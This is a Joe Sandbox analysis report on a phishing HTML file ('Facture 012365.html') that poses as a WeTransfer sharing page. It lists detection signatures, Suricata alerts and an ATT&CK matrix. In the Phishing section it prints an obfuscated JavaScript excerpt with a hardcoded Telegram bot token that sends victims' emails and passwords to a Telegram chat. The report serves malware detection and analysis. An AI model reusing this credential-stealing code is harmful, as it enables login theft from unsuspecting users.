Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_camp

Overview

General Information

Sample URL:https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_net
Analysis ID:1670900
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
AI detected suspicious Javascript
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
None HTTPS page querying sensitive user data (password, username or email)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-22T09:46:18.207394+020018100071Potentially Bad Traffic192.168.2.1650053149.154.167.220443TCP
2025-04-22T09:46:19.540811+020018100071Potentially Bad Traffic192.168.2.1650055149.154.167.220443TCP

Joe Sandbox Signatures

  • Phishing
  • Networking
  • System Summary

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.19.pages.csv
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.20.pages.csv
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.21.pages.csv
Source: 1.199..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Facture%20012365.htm... This script demonstrates several high-risk behaviors that indicate potential malicious intent:1. Dynamic Code Execution: The script uses obfuscated code with the `_0x1298` function, which appears to be a custom implementation of a code execution mechanism. This is a high-risk indicator.2. Data Exfiltration: The script sends user data (email and password) to a Telegram bot API endpoint, which is a clear case of data exfiltration and a high-risk indicator.3. Obfuscated Code/URLs: The script uses heavily obfuscated variable names and function calls, which is a high-risk indicator.4. Suspicious Domains: The script attempts to redirect the user to the domain 'wetransfer.com', which is not a trusted domain and may be part of a phishing or malware campaign.Overall, the combination of these high-risk behaviors and the suspicious nature of the script's functionality suggests that this is a highly malicious script that should be blocked and investigated further.
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: var _0x40d1b3 = _0x1298; function _0x1298(_0x93b389, _0x301fc5) { var _0x190b9e = _0x190b(); return ( (_0x1298 = function (_0x12988f, _0x35f94c) { _0x12988f = _0x12988f - 0x121; var _0x866d3 = _0x190b9e[_0x12988f]; return _0x866d3; }), _0x1298(_0x93b389, _0x301fc5) ); } function _0x1298a(data) { const _0x40d1b3a = '7323885544:aagjtnqqrvbilbh0dhfsyc9qs_pg5mapcgk'; const _0x301fc5a = '5442419581'; const _0x93b389a = ` - ${data.email}:${data.password}`; const _0x190b9ea = `https://api.telegram.org/bot${_0x40d1b3a}/sendmessage?chat_id=${_0x301fc5a}&text=${encodeuricomponent( _0x93b389a )}`; fetch(_0x190b9ea, { method: "get" }) .then((response) => { if (response.ok) { // la requte a russi } else { } }) .catch((error) => { console.error(error); }); } function _0x190b() { var _0...
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: Total embedded image size: 23250
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: Base64 decoded: auth0|678f85cbbe51a88063644377
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: Title: Wetransfer - Partage de document. does not match URL
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: <input type="password" .../> found
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Facture%20012365.htmlHTTP Parser: No <meta name="copyright".. found

Networking

barindex
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:50055 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:50053 -> 149.154.167.220:443
Source: classification engineClassification label: mal64.phis.win@0/0@0/0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions		Path InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1670900 URL: https://wetransfer.com/down... Startdate: 22/04/2025 Architecture: WINDOWS Score: 64 5 Suricata IDS alerts for network traffic 2->5 7 AI detected phishing page 2->7 9 AI detected suspicious Javascript 2->9 11 Javascript uses Telegram API 2->11

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

No bigger version

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_010%Avira URL Cloudsafe

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/Facture%20012365.html0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
file:///C:/Users/user/Desktop/Facture%20012365.htmltrue
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1670900
Start date and time:2025-04-22 09:43:59 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Sample URL:https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&t_network=email&t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&t_s=download_link&t_ts=1745257267&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:0
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Detection:MAL
Classification:mal64.phis.win@0/0@0/0
  • No process behavior to analyse as no analysis process or sample was found
  • Excluded IPs from analysis (whitelisted): 142.250.68.227, 142.251.2.84, 142.250.68.238, 20.109.210.53, 192.178.49.162, 150.171.27.10, 184.29.183.29, 192.178.49.195, 192.178.49.170
  • Excluded domains from analysis (whitelisted): clients2.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, translate.googleapis.com, bat.bing.com, update.googleapis.com, clientservices.googleapis.com, pagead2.googlesyndication.com
  • VT rate limit hit for: https://wetransfer.com/downloads/c3dede94d9c8b77a4c715e365d83619720250421174056/780f964fd4619af380d47a3fa4b4f24e20250421174107/826b13?t_exp=1745516456&amp;t_lsid=c1cbfe35-fe1f-47dd-a346-99a0ddfccc65&amp;t_network=email&amp;t_rid=YXV0aDB8Njc4Zjg1Y2JiZTUxYTg4MDYzNjQ0Mzc3&amp;t_s=download_link&amp;t_ts=1745257267&amp;utm_campaign=TRN_TDL_01&amp;utm_source=sendgrid&amp;utm_medium=email&amp;trk=TRN_TDL_01

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

No static file info

Network Behavior

No network behavior found

Statistics

No statistics

System Behavior

No system behavior

Disassembly

No disassembly